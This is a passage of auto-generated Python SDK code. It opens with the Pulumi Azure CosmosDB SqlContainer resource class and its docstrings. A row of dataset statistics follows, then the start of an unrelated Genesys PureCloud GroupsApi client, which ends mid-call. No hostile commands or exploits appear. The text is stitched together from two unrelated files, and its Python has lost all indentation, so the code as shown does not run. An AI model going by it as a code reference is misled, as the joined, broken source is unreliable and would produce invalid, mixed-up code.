:param pulumi.Input[int] default_ttl: The default time to live of SQL container. If missing, items are not expired automatically. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input['SqlContainerIndexingPolicyArgs'] indexing_policy: An `indexing_policy` block as defined below.
:param pulumi.Input[str] name: Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
:param pulumi.Input[str] partition_key_path: Define a partition key. Changing this forces a new resource to be created.
:param pulumi.Input[int] partition_key_version: Define a partition key version. Changing this forces a new resource to be created. Possible values are `1 `and `2`. This should be set to `2` in order to use large partition keys.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
:param pulumi.Input[int] throughput: The throughput of SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation otherwise it cannot be updated without a manual resource destroy-apply.
:param pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]] unique_keys: One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
if account_name is not None:
pulumi.set(__self__, "account_name", account_name)
if analytical_storage_ttl is not None:
pulumi.set(__self__, "analytical_storage_ttl", analytical_storage_ttl)
if autoscale_settings is not None:
pulumi.set(__self__, "autoscale_settings", autoscale_settings)
if conflict_resolution_policy is not None:
pulumi.set(__self__, "conflict_resolution_policy", conflict_resolution_policy)
if database_name is not None:
pulumi.set(__self__, "database_name", database_name)
if default_ttl is not None:
pulumi.set(__self__, "default_ttl", default_ttl)
if indexing_policy is not None:
pulumi.set(__self__, "indexing_policy", indexing_policy)
if name is not None:
pulumi.set(__self__, "name", name)
if partition_key_path is not None:
pulumi.set(__self__, "partition_key_path", partition_key_path)
if partition_key_version is not None:
pulumi.set(__self__, "partition_key_version", partition_key_version)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if throughput is not None:
pulumi.set(__self__, "throughput", throughput)
if unique_keys is not None:
pulumi.set(__self__, "unique_keys", unique_keys)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="analyticalStorageTtl")
def analytical_storage_ttl(self) -> Optional[pulumi.Input[int]]:
"""
The default time to live of Analytical Storage for this SQL container. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "analytical_storage_ttl")
@analytical_storage_ttl.setter
def analytical_storage_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "analytical_storage_ttl", value)
@property
@pulumi.getter(name="autoscaleSettings")
def autoscale_settings(self) -> Optional[pulumi.Input['SqlContainerAutoscaleSettingsArgs']]:
"""
An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
"""
return pulumi.get(self, "autoscale_settings")
@autoscale_settings.setter
def autoscale_settings(self, value: Optional[pulumi.Input['SqlContainerAutoscaleSettingsArgs']]):
pulumi.set(self, "autoscale_settings", value)
@property
@pulumi.getter(name="conflictResolutionPolicy")
def conflict_resolution_policy(self) -> Optional[pulumi.Input['SqlContainerConflictResolutionPolicyArgs']]:
"""
A `conflict_resolution_policy` blocks as defined below.
"""
return pulumi.get(self, "conflict_resolution_policy")
@conflict_resolution_policy.setter
def conflict_resolution_policy(self, value: Optional[pulumi.Input['SqlContainerConflictResolutionPolicyArgs']]):
pulumi.set(self, "conflict_resolution_policy", value)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter(name="defaultTtl")
def default_ttl(self) -> Optional[pulumi.Input[int]]:
"""
The default time to live of SQL container. If missing, items are not expired automatically. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "default_ttl")
@default_ttl.setter
def default_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_ttl", value)
@property
@pulumi.getter(name="indexingPolicy")
def indexing_policy(self) -> Optional[pulumi.Input['SqlContainerIndexingPolicyArgs']]:
"""
An `indexing_policy` block as defined below.
"""
return pulumi.get(self, "indexing_policy")
@indexing_policy.setter
def indexing_policy(self, value: Optional[pulumi.Input['SqlContainerIndexingPolicyArgs']]):
pulumi.set(self, "indexing_policy", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="partitionKeyPath")
def partition_key_path(self) -> Optional[pulumi.Input[str]]:
"""
Define a partition key. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "partition_key_path")
@partition_key_path.setter
def partition_key_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partition_key_path", value)
@property
@pulumi.getter(name="partitionKeyVersion")
def partition_key_version(self) -> Optional[pulumi.Input[int]]:
"""
Define a partition key version. Changing this forces a new resource to be created. Possible values are `1 `and `2`. This should be set to `2` in order to use large partition keys.
"""
return pulumi.get(self, "partition_key_version")
@partition_key_version.setter
def partition_key_version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "partition_key_version", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def throughput(self) -> Optional[pulumi.Input[int]]:
"""
The throughput of SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation otherwise it cannot be updated without a manual resource destroy-apply.
"""
return pulumi.get(self, "throughput")
@throughput.setter
def throughput(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throughput", value)
@property
@pulumi.getter(name="uniqueKeys")
def unique_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]]]:
"""
One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "unique_keys")
@unique_keys.setter
def unique_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]]]):
pulumi.set(self, "unique_keys", value)
class SqlContainer(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input[pulumi.InputType['SqlContainerAutoscaleSettingsArgs']]] = None,
conflict_resolution_policy: Optional[pulumi.Input[pulumi.InputType['SqlContainerConflictResolutionPolicyArgs']]] = None,
database_name: Optional[pulumi.Input[str]] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
indexing_policy: Optional[pulumi.Input[pulumi.InputType['SqlContainerIndexingPolicyArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
partition_key_path: Optional[pulumi.Input[str]] = None,
partition_key_version: Optional[pulumi.Input[int]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
throughput: Optional[pulumi.Input[int]] = None,
unique_keys: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SqlContainerUniqueKeyArgs']]]]] = None,
__props__=None):
"""
Manages a SQL Container within a Cosmos DB Account.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example = azure.cosmosdb.SqlContainer("example",
resource_group_name=azurerm_cosmosdb_account["example"]["resource_group_name"],
account_name=azurerm_cosmosdb_account["example"]["name"],
database_name=azurerm_cosmosdb_sql_database["example"]["name"],
partition_key_path="/definition/id",
partition_key_version=1,
throughput=400,
indexing_policy=azure.cosmosdb.SqlContainerIndexingPolicyArgs(
indexing_mode="Consistent",
included_paths=[
azure.cosmosdb.SqlContainerIndexingPolicyIncludedPathArgs(
path="/*",
),
azure.cosmosdb.SqlContainerIndexingPolicyIncludedPathArgs(
path="/included/?",
),
],
excluded_paths=[azure.cosmosdb.SqlContainerIndexingPolicyExcludedPathArgs(
path="/excluded/?",
)],
),
unique_keys=[azure.cosmosdb.SqlContainerUniqueKeyArgs(
paths=[
"/definition/idlong",
"/definition/idshort",
],
)])
```
## Import
Cosmos SQL Containers can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:cosmosdb/sqlContainer:SqlContainer example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DocumentDB/databaseAccounts/account1/sqlDatabases/database1/containers/container1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this SQL container. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input[pulumi.InputType['SqlContainerAutoscaleSettingsArgs']] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
:param pulumi.Input[pulumi.InputType['SqlContainerConflictResolutionPolicyArgs']] conflict_resolution_policy: A `conflict_resolution_policy` blocks as defined below.
:param pulumi.Input[str] database_name: The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[int] default_ttl: The default time to live of SQL container. If missing, items are not expired automatically. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input[pulumi.InputType['SqlContainerIndexingPolicyArgs']] indexing_policy: An `indexing_policy` block as defined below.
:param pulumi.Input[str] name: Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
:param pulumi.Input[str] partition_key_path: Define a partition key. Changing this forces a new resource to be created.
:param pulumi.Input[int] partition_key_version: Define a partition key version. Changing this forces a new resource to be created. Possible values are `1 `and `2`. This should be set to `2` in order to use large partition keys.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
:param pulumi.Input[int] throughput: The throughput of SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation otherwise it cannot be updated without a manual resource destroy-apply.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SqlContainerUniqueKeyArgs']]]] unique_keys: One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SqlContainerArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a SQL Container within a Cosmos DB Account.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example = azure.cosmosdb.SqlContainer("example",
resource_group_name=azurerm_cosmosdb_account["example"]["resource_group_name"],
account_name=azurerm_cosmosdb_account["example"]["name"],
database_name=azurerm_cosmosdb_sql_database["example"]["name"],
partition_key_path="/definition/id",
partition_key_version=1,
throughput=400,
indexing_policy=azure.cosmosdb.SqlContainerIndexingPolicyArgs(
indexing_mode="Consistent",
included_paths=[
azure.cosmosdb.SqlContainerIndexingPolicyIncludedPathArgs(
path="/*",
),
azure.cosmosdb.SqlContainerIndexingPolicyIncludedPathArgs(
path="/included/?",
),
],
excluded_paths=[azure.cosmosdb.SqlContainerIndexingPolicyExcludedPathArgs(
path="/excluded/?",
)],
),
unique_keys=[azure.cosmosdb.SqlContainerUniqueKeyArgs(
paths=[
"/definition/idlong",
"/definition/idshort",
],
)])
```
## Import
Cosmos SQL Containers can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:cosmosdb/sqlContainer:SqlContainer example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DocumentDB/databaseAccounts/account1/sqlDatabases/database1/containers/container1
```
:param str resource_name: The name of the resource.
:param SqlContainerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SqlContainerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input[pulumi.InputType['SqlContainerAutoscaleSettingsArgs']]] = None,
conflict_resolution_policy: Optional[pulumi.Input[pulumi.InputType['SqlContainerConflictResolutionPolicyArgs']]] = None,
database_name: Optional[pulumi.Input[str]] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
indexing_policy: Optional[pulumi.Input[pulumi.InputType['SqlContainerIndexingPolicyArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
partition_key_path: Optional[pulumi.Input[str]] = None,
partition_key_version: Optional[pulumi.Input[int]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
throughput: Optional[pulumi.Input[int]] = None,
unique_keys: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SqlContainerUniqueKeyArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SqlContainerArgs.__new__(SqlContainerArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["analytical_storage_ttl"] = analytical_storage_ttl
__props__.__dict__["autoscale_settings"] = autoscale_settings
__props__.__dict__["conflict_resolution_policy"] = conflict_resolution_policy
if database_name is None and not opts.urn:
raise TypeError("Missing required property 'database_name'")
__props__.__dict__["database_name"] = database_name
__props__.__dict__["default_ttl"] = default_ttl
__props__.__dict__["indexing_policy"] = indexing_policy
__props__.__dict__["name"] = name
if partition_key_path is None and not opts.urn:
raise TypeError("Missing required property 'partition_key_path'")
__props__.__dict__["partition_key_path"] = partition_key_path
__props__.__dict__["partition_key_version"] = partition_key_version
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["throughput"] = throughput
__props__.__dict__["unique_keys"] = unique_keys
super(SqlContainer, __self__).__init__(
'azure:cosmosdb/sqlContainer:SqlContainer',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input[pulumi.InputType['SqlContainerAutoscaleSettingsArgs']]] = None,
conflict_resolution_policy: Optional[pulumi.Input[pulumi.InputType['SqlContainerConflictResolutionPolicyArgs']]] = None,
database_name: Optional[pulumi.Input[str]] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
indexing_policy: Optional[pulumi.Input[pulumi.InputType['SqlContainerIndexingPolicyArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
partition_key_path: Optional[pulumi.Input[str]] = None,
partition_key_version: Optional[pulumi.Input[int]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
throughput: Optional[pulumi.Input[int]] = None,
unique_keys: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SqlContainerUniqueKeyArgs']]]]] = None) -> 'SqlContainer':
"""
Get an existing SqlContainer resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this SQL container. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input[pulumi.InputType['SqlContainerAutoscaleSettingsArgs']] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
:param pulumi.Input[pulumi.InputType['SqlContainerConflictResolutionPolicyArgs']] conflict_resolution_policy: A `conflict_resolution_policy` blocks as defined below.
:param pulumi.Input[str] database_name: The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[int] default_ttl: The default time to live of SQL container. If missing, items are not expired automatically. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input[pulumi.InputType['SqlContainerIndexingPolicyArgs']] indexing_policy: An `indexing_policy` block as defined below.
:param pulumi.Input[str] name: Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
:param pulumi.Input[str] partition_key_path: Define a partition key. Changing this forces a new resource to be created.
:param pulumi.Input[int] partition_key_version: Define a partition key version. Changing this forces a new resource to be created. Possible values are `1 `and `2`. This should be set to `2` in order to use large partition keys.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
:param pulumi.Input[int] throughput: The throughput of SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation otherwise it cannot be updated without a manual resource destroy-apply.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SqlContainerUniqueKeyArgs']]]] unique_keys: One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SqlContainerState.__new__(_SqlContainerState)
__props__.__dict__["account_name"] = account_name
__props__.__dict__["analytical_storage_ttl"] = analytical_storage_ttl
__props__.__dict__["autoscale_settings"] = autoscale_settings
__props__.__dict__["conflict_resolution_policy"] = conflict_resolution_policy
__props__.__dict__["database_name"] = database_name
__props__.__dict__["default_ttl"] = default_ttl
__props__.__dict__["indexing_policy"] = indexing_policy
__props__.__dict__["name"] = name
__props__.__dict__["partition_key_path"] = partition_key_path
__props__.__dict__["partition_key_version"] = partition_key_version
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["throughput"] = throughput
__props__.__dict__["unique_keys"] = unique_keys
return SqlContainer(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Output[str]:
"""
The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "account_name")
@property
@pulumi.getter(name="analyticalStorageTtl")
def analytical_storage_ttl(self) -> pulumi.Output[Optional[int]]:
"""
The default time to live of Analytical Storage for this SQL container. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "analytical_storage_ttl")
@property
@pulumi.getter(name="autoscaleSettings")
def autoscale_settings(self) -> pulumi.Output[Optional['outputs.SqlContainerAutoscaleSettings']]:
"""
An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
"""
return pulumi.get(self, "autoscale_settings")
@property
@pulumi.getter(name="conflictResolutionPolicy")
def conflict_resolution_policy(self) -> pulumi.Output['outputs.SqlContainerConflictResolutionPolicy']:
"""
A `conflict_resolution_policy` blocks as defined below.
"""
return pulumi.get(self, "conflict_resolution_policy")
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Output[str]:
"""
The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@property
@pulumi.getter(name="defaultTtl")
def default_ttl(self) -> pulumi.Output[int]:
"""
The default time to live of SQL container. If missing, items are not expired automatically. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "default_ttl")
@property
@pulumi.getter(name="indexingPolicy")
def indexing_policy(self) -> pulumi.Output['outputs.SqlContainerIndexingPolicy']:
"""
An `indexing_policy` block as defined below.
"""
return pulumi.get(self, "indexing_policy")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="partitionKeyPath")
def partition_key_path(self) -> pulumi.Output[str]:
"""
Define a partition key. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "partition_key_path")
@property
@pulumi.getter(name="partitionKeyVersion")
def partition_key_version(self) -> pulumi.Output[Optional[int]]:
"""
Define a partition key version. Changing this forces a new resource to be created. Possible values are `1 `and `2`. This should be set to `2` in order to use large partition keys.
"""
return pulumi.get(self, "partition_key_version")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def throughput(self) -> pulumi.Output[int]:
"""
The throughput of SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation otherwise it cannot be updated without a manual resource destroy-apply.
"""
return pulumi.get(self, "throughput")
@property
@pulumi.getter(name="uniqueKeys")
def unique_keys(self) -> pulumi.Output[Optional[Sequence['outputs.SqlContainerUniqueKey']]]:
"""
One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "unique_keys")
| 58.21393 | 353 | 0.688702 | 5,735 | 46,804 | 5.439058 | 0.046382 | 0.065592 | 0.063957 | 0.029846 | 0.941365 | 0.930561 | 0.926426 | 0.917321 | 0.915398 | 0.904818 | 0 | 0.004337 | 0.22169 | 46,804 | 803 | 354 | 58.286426 | 0.85157 | 0.436288 | 0 | 0.802273 | 1 | 0 | 0.16539 | 0.084404 | 0 | 0 | 0 | 0 | 0 | 1 | 0.163636 | false | 0.002273 | 0.015909 | 0 | 0.277273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2a00239bfb3d2789c0362796dcced6f49fedbdbe | 44,491 | py | Python | build/PureCloudPlatformClientV2/apis/groups_api.py | cjohnson-ctl/platform-client-sdk-python | 38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100 | [
"MIT"
] | 10 | 2019-02-22T00:27:08.000Z | 2021-09-12T23:23:44.000Z | libs/PureCloudPlatformClientV2/apis/groups_api.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
] | 5 | 2018-06-07T08:32:00.000Z | 2021-07-28T17:37:26.000Z | libs/PureCloudPlatformClientV2/apis/groups_api.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
] | 6 | 2020-04-09T17:43:07.000Z | 2022-02-17T08:48:05.000Z | # coding: utf-8
"""
GroupsApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class GroupsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def delete_group(self, group_id, **kwargs):
"""
Delete group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group(group_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: Group ID (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `delete_group`")
resource_path = '/api/v2/groups/{groupId}'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def delete_group_members(self, group_id, ids, **kwargs):
"""
Remove members
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_members(group_id, ids, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: Group ID (required)
:param str ids: Comma separated list of userIds to remove (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id', 'ids']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_group_members" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `delete_group_members`")
# verify the required parameter 'ids' is set
if ('ids' not in params) or (params['ids'] is None):
raise ValueError("Missing the required parameter `ids` when calling `delete_group_members`")
resource_path = '/api/v2/groups/{groupId}/members'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
if 'ids' in params:
query_params['ids'] = params['ids']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_fieldconfig(self, type, **kwargs):
"""
Fetch field config for an entity type
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fieldconfig(type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str type: Field type (required)
:return: FieldConfig
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['type']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fieldconfig" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'type' is set
if ('type' not in params) or (params['type'] is None):
raise ValueError("Missing the required parameter `type` when calling `get_fieldconfig`")
resource_path = '/api/v2/fieldconfig'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'type' in params:
query_params['type'] = params['type']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FieldConfig',
